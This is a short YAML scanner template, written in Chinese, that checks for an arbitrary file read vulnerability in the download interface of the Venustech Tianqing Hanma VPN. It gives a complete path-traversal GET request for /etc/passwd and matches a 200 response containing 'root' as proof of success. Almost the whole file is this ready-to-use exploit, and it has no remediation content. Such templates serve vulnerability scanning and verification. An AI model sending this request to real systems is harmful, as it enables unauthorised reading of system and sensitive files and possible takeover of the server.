keyword: 天清汉马VPN
name: 天清汉马VPN接口download任意文件读取
description: |
  启明星辰天清汉马VPN系统download接口处存在任意文件读取漏洞，获取服务器的敏感数据和配置信息，造成系统的不安全性，从而控制服务器
requests: # 为空代表默认或者不启用
  path: "/vpn/user/download/client?ostype=../../../../../../../etc/passwd"
  method: GET
  headers:
    User-agent: 
    Content-length: 
    Accept: 
    Content-type: 
    Accept-Encoding: 
    Cookie: 
    Referer: 
    X-Forwarded-For: 
  body-raw: |-
    

response: 
  path: "" 
  status-code: 200
  body: "root"
  headers:
    Server: 
    Content-type: 
    Content-length: 
    Date: 
    Connection: 
impact: |
  数据库等高敏感度文件泄露。